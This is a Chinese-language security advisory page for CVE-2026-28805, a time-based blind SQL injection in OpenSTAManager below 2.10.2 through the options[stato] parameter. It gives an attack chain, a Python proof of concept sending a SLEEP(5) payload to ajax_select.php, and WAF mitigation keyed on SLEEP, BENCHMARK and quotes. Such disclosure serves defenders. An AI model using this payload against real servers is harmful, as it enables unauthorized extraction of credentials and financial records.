IPBUF安全漏洞报告
English
CVE-2026-28805 CVSS 8.8 高危

CVE-2026-28805 OpenSTAManager SQL注入漏洞

披露日期: 2026-04-02

漏洞信息

漏洞编号
CVE-2026-28805
漏洞类型
SQL注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenSTAManager

相关标签

SQL注入盲注OpenSTAManagerCVE-2026-28805RCE

漏洞概述

OpenSTAManager在2.10.2之前的版本中存在基于时间的盲注SQL注入漏洞。攻击者可以通过AJAX select处理程序中的options[stato] GET参数注入恶意SQL语句。由于系统未对用户输入进行充分的清理或参数化处理,导致攻击者能够拼接SQL语句。已认证的攻击者可利用此漏洞提取数据库中的敏感信息,包括用户名、密码哈希及财务记录等。

技术细节

该漏洞的核心原因在于OpenSTAManager的多个AJAX选择处理程序未对用户输入进行有效的安全过滤。具体实现中,应用程序直接从全局变量$superselect['stato']中获取通过GET请求传递的options[stato]参数值。随后,该值被直接拼接进SQL查询的WHERE子句中作为裸表达式执行,完全缺乏预编译语句或输入白名单等防御机制。攻击者利用这一缺陷,可以注入基于时间的盲注Payload。虽然无法直接获取查询结果,但通过利用SLEEP()函数或BENCHMARK()函数使数据库产生延迟,攻击者可以根据HTTP响应的时间差推断出SQL语句的真假,进而逐字节提取数据库中的用户凭证、财务记录等高度敏感信息。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标运行的是OpenSTAManager,且版本低于2.10.2。
STEP 2
2. 身份认证
攻击者利用低权限账户登录系统(CVSS PR:L要求)。
STEP 3
3. 漏洞利用
攻击者向AJAX select处理程序发送特制的GET请求,在options[stato]参数中注入基于时间的SQL盲注Payload。
STEP 4
4. 数据窃取
通过分析服务器响应时间,攻击者逐位推断出数据库内容,提取用户名、密码哈希等敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import time # Target URL (example) target_url = "http://target-openstamanager/ajax_select.php" # The vulnerable parameter is options[stato] # Payload to check time-based blind SQL injection # If the database sleeps for 5 seconds, the condition is True payload = "1' AND (SELECT SLEEP(5))-- -" params = { "options[stato]": payload } try: print(f"[+] Sending payload to {target_url}...") start_time = time.time() response = requests.get(target_url, params=params, timeout=10) end_time = time.time() elapsed = end_time - start_time if elapsed >= 5: print(f"[!] Vulnerability Confirmed! Response time: {elapsed:.2f}s") else: print(f"[-] Not vulnerable or patch applied. Response time: {elapsed:.2f}s") except requests.exceptions.RequestException as e: print(f"[Error] Request failed: {e}")

影响范围

OpenSTAManager < 2.10.2

防御指南

临时缓解措施
如果无法立即升级,建议通过Web应用防火墙(WAF)拦截包含常见SQL注入特征(如SLEEP、BENCHMARK、单引号等)的请求流量,并严格限制数据库账户的访问权限。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表